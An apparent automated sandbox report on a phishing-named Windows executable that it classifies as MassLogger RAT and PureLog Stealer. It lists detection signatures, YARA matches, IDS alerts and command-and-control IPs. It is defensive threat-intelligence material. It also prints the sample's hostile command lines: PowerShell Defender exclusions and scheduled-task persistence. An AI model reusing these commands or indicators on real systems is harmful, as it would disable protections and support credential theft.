
Windows Analysis Report
RFQ_PO N89397-GM7287-Order.bat.exe

Overview

General Information

Sample name: RFQ_PO N89397-GM7287-Order.bat.exe
Analysis ID: 1564874
MD5: 06c13587e9a7af60860cb6e2c4f3a7b2
SHA1: 238f5ddcd0193aba7b760b7ab6f3f982d73383b5
SHA256: efd64c0b88bbe45461d13b2a0acd9544218f819f4579af35b5fc92e20d5f6fa5
Tags: exe, user-TeamDreier

Detection

MassLogger RAT, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to behave differently if execute on a Russian/Kazak computer
Creates files in the system32 config directory
Creates files inside the volume driver (system volume information)
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • RFQ_PO N89397-GM7287-Order.bat.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe" MD5: 06C13587E9A7AF60860CB6E2C4F3A7B2)
    • powershell.exe (PID: 7548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1988 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7640 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 7796 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
  • armsvc.exe (PID: 7848 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: C0525CFD34E032B8DE30555E54329700)
  • alg.exe (PID: 7880 cmdline: C:\Windows\System32\alg.exe MD5: 837DCB726B9BB3B6F4FEF3318B9DEEAD)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 7932 cmdline: C:\Windows\system32\AppVClient.exe MD5: A402C4C181FB483490A130C24E7F84A6)
  • FXSSVC.exe (PID: 8028 cmdline: C:\Windows\system32\fxssvc.exe MD5: B184A2D21BE1424241C0CC6F3EE4C667)
  • elevation_service.exe (PID: 8136 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: D2EAE0B17D8ED7CE90F29615B714FC9B)
  • maintenanceservice.exe (PID: 8180 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 644513105C5FAA8D93951A3690E4014C)
  • msdtc.exe (PID: 6332 cmdline: C:\Windows\System32\msdtc.exe MD5: 2AF6C23F4C869205351AA38C5DD66D6E)
  • PerceptionSimulationService.exe (PID: 2688 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 4C2FEBAD6B92DDA4F72130648DB37727)
  • YRtQgzFlDnVSru.exe (PID: 2648 cmdline: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe MD5: 06C13587E9A7AF60860CB6E2C4F3A7B2)
    • schtasks.exe (PID: 7584 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmp15E7.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 3628 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
  • perfhost.exe (PID: 2408 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: 3A2A9E48FBD06CF338FA403E33134177)
  • Locator.exe (PID: 6388 cmdline: C:\Windows\system32\locator.exe MD5: E970472BE732DDA93E40BA89E643BD45)
  • SensorDataService.exe (PID: 4324 cmdline: C:\Windows\System32\SensorDataService.exe MD5: 02C2C736D5DC9AC9088C92AFC077A118)
  • snmptrap.exe (PID: 4856 cmdline: C:\Windows\System32\snmptrap.exe MD5: F35B03B0A56AB372234FE7A532455C96)
  • Spectrum.exe (PID: 1912 cmdline: C:\Windows\system32\spectrum.exe MD5: EA5AC5AC3ADFDE43933DEF676A6978C0)
  • ssh-agent.exe (PID: 7692 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: D09CFE9983E805B17E25ED1928A06826)
  • TieringEngineService.exe (PID: 1516 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: 85B511CA7AB5F39352DEB0D3C0A048DC)
  • AgentService.exe (PID: 7708 cmdline: C:\Windows\system32\AgentService.exe MD5: E46CE79404D95E10B788E99FB6C2C36E)
  • vds.exe (PID: 7724 cmdline: C:\Windows\System32\vds.exe MD5: 0C54A7E73768E6C53E87391113A18ADF)
  • wbengine.exe (PID: 2840 cmdline: "C:\Windows\system32\wbengine.exe" MD5: ADB425AC8592C2AD75F997794106A5E3)
No configs have been found
Yara matches in memory dumps

Source | Rule | Description | Author | Strings
00000009.00000002.2696625029.000000000794C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | (listed below)
  • 0x643ae:$a1: get_encryptedPassword
  • 0x64382:$a2: get_encryptedUsername
  • 0x64446:$a3: get_timePasswordChanged
  • 0x6435e:$a4: get_passwordField
  • 0x643c4:$a5: set_encryptedPassword
  • 0x64191:$a7: get_logins
  • 0x6371b:$a8: GetOutlookPasswords
  • 0x62c44:$a9: StartKeylogger
  • 0x615a6:$a10: KeyLoggerEventArgs
  • 0x61575:$a11: KeyLoggerEventArgsEventHandler
  • 0x64265:$a13: _encryptedPassword
00000000.00000002.1426195581.0000000004A29000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
(22 further entries collapsed in the original report)

Yara matches in unpacked PE files

Source | Rule | Description | Author | Strings
42.2.vbc.exe.7590f08.3.raw.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
42.2.vbc.exe.7590f08.3.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
42.2.vbc.exe.7590f08.3.raw.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | (listed below)
  • 0x22a08:$a1: get_encryptedPassword
  • 0x229dc:$a2: get_encryptedUsername
  • 0x22aa0:$a3: get_timePasswordChanged
  • 0x229b8:$a4: get_passwordField
  • 0x22a1e:$a5: set_encryptedPassword
  • 0x227eb:$a7: get_logins
  • 0x21d75:$a8: GetOutlookPasswords
  • 0x2129e:$a9: StartKeylogger
  • 0x1fc00:$a10: KeyLoggerEventArgs
  • 0x1fbcf:$a11: KeyLoggerEventArgsEventHandler
  • 0x228bf:$a13: _encryptedPassword
42.2.vbc.exe.8745570.7.raw.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
42.2.vbc.exe.8745570.7.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
(54 further entries collapsed in the original report)

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe, ParentProcessId: 7316, ParentProcessName: RFQ_PO N89397-GM7287-Order.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", ProcessId: 7548, ProcessName: powershell.exe
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe, ParentProcessId: 7316, ParentProcessName: RFQ_PO N89397-GM7287-Order.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", ProcessId: 7548, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmp15E7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmp15E7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe, ParentImage: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe, ParentProcessId: 2648, ParentProcessName: YRtQgzFlDnVSru.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmp15E7.tmp", ProcessId: 7584, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe, ParentProcessId: 7316, ParentProcessName: RFQ_PO N89397-GM7287-Order.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp", ProcessId: 7640, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe, ParentProcessId: 7316, ParentProcessName: RFQ_PO N89397-GM7287-Order.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", ProcessId: 7548, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe, ParentProcessId: 7316, ParentProcessName: RFQ_PO N89397-GM7287-Order.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp", ProcessId: 7640, ProcessName: schtasks.exe

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-28T22:44:52.841706+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.7 | 54852 | 1.1.1.1 | 53 | UDP
2024-11-28T22:44:53.832881+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.7 | 54852 | 1.1.1.1 | 53 | UDP
2024-11-28T22:44:54.848703+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.7 | 54852 | 1.1.1.1 | 53 | UDP
2024-11-28T22:44:56.874648+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.7 | 54852 | 1.1.1.1 | 53 | UDP
2024-11-28T22:44:49.363972+0100 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.7 | 53251 | 1.1.1.1 | 53 | UDP
2024-11-28T22:44:37.090921+0100 | 2018141 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.7 | 49740 | TCP
2024-11-28T22:46:17.023299+0100 | 2018141 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.7 | 49922 | TCP
2024-11-28T22:44:37.090921+0100 | 2037771 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.7 | 49740 | TCP
2024-11-28T22:46:17.023299+0100 | 2037771 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.7 | 49922 | TCP
2024-11-28T22:44:28.600332+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49718 | 132.226.247.73 | 80 | TCP
2024-11-28T22:44:41.628617+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49754 | 132.226.247.73 | 80 | TCP
2024-11-28T22:44:51.227117+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49780 | 172.234.222.138 | 80 | TCP
2024-11-28T22:46:06.959081+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49903 | 82.112.184.197 | 80 | TCP


AV Detection

Source: RFQ_PO N89397-GM7287-Order.bat.exe; Avira: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: RFQ_PO N89397-GM7287-Order.bat.exe; ReversingLabs: Detection: 28%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe; Joe Sandbox ML: detected
Source: RFQ_PO N89397-GM7287-Order.bat.exe; Joe Sandbox ML: detected

Location Tracking

Source: unknown; DNS query: name: reallyfreegeoip.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 9_2_00F48286 CryptStringToBinaryA,CryptStringToBinaryA,GetTokenInformation,GetTokenInformation,GetLastError,OpenProcessToken,CloseHandle,GetSidSubAuthorityCount,9_2_00F48286
Source: RFQ_PO N89397-GM7287-Order.bat.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49725 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49759 version: TLS 1.0
Source: RFQ_PO N89397-GM7287-Order.bat.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
